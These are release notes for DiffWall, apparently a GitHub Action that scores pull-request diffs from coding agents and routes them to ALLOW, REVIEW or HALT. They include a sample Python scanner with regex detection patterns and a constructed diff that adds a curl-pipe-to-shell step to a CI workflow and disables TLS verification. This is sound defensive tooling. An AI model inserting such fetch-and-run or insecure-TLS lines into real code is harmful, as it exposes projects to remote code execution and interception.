v0.1.1 — Action-first MVP update
First update to the runnable release of DiffWall: a deterministic PR risk firewall for agent-written code.
What’s included
- GitHub Action wrapper: dburt-proex/diffwall/action@v0.1.0
- Deterministic diff scanner
- ALLOW / REVIEW / HALT routing model
- Rule-based risk scoring
- Markdown and JSON report output
- Default policy file: rules/default.yml
- CI workflow for install, build, test, and demo scan
Risk detectors included
- Protected path changes
- GitHub workflow changes
- Auth/security/billing path changes
- Secret-like strings
- Dependency manifest changes
- Package install scripts
- Destructive SQL and shell operations
- TLS verification disablement
- Remote shell pipes
- Network egress near environment access
- Large diffs
- Source changes without tests
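To make the routing model concrete, here is an added example (not DiffWall's own code) of a deterministic scanner that checks only the added lines of a unified diff for three of the detectors listed above and routes the result to ALLOW / REVIEW / HALT. The rule names, regexes, weights and thresholds are assumptions for illustration and are not taken from rules/default.yml.

```python
import re

# Hypothetical rules, weights and thresholds (assumptions, not rules/default.yml).
LINE_RULES = [
    ("tls-verification-disabled", 40, re.compile(
        r"verify\s*=\s*False|rejectUnauthorized\s*:\s*false"
        r"|InsecureSkipVerify\s*:\s*true|curl\b.*\s(-k|--insecure)\b")),
    ("remote-shell-pipe", 60, re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
]
PATH_RULES = [("github-workflow-change", 30, re.compile(r"^\.github/workflows/"))]
REVIEW_AT, HALT_AT = 30, 60

def scan_diff(diff_text):
    """Return (rule, path, added_line, weight) for each hit in a unified diff."""
    findings, path, prev = [], None, ""
    for line in diff_text.splitlines():
        if line.startswith("+++ ") and prev.startswith("--- "):
            # File header: remember the new path and apply path rules once.
            path = re.sub(r"^b/", "", line[4:].strip())
            findings += [(r, path, None, w) for r, w, rx in PATH_RULES if rx.search(path)]
        elif line.startswith("+"):
            # Added lines only: removed and context lines introduce nothing new.
            findings += [(r, path, line[1:].strip(), w)
                         for r, w, rx in LINE_RULES if rx.search(line[1:])]
        prev = line
    return findings

def route(findings):
    """Map the summed weight to a decision; the same diff always gives the same result."""
    score = sum(w for *_, w in findings)
    decision = "HALT" if score >= HALT_AT else "REVIEW" if score >= REVIEW_AT else "ALLOW"
    return decision, score

# Constructed sample diff (not from a real repository).
SAMPLE_DIFF = """\
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -10,1 +10,2 @@
       - uses: actions/checkout@v4
+      - run: curl -fsSL https://example.invalid/install.sh | sh
--- a/client.py
+++ b/client.py
@@ -1,1 +1,1 @@
-resp = requests.get(url)
+resp = requests.get(url, verify=False)
"""

if __name__ == "__main__":
    hits = scan_diff(SAMPLE_DIFF)
    for rule, path, text, weight in hits:
        print(f"{weight:>3} {rule} {path}: {text or '(path match)'}")
    print(route(hits))
```

Scanning only added lines means a PR that removes a risky line (for example, deleting verify=False) is not penalized for it.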
Install
```yaml
- name: Run DiffWall
  uses: dburt-proex/diffwall/action@v0.1.0
  with:
    base: origin/${{ github.base_ref }}
    head: HEAD
    config: rules/default.yml
    fail-on-halt: true
```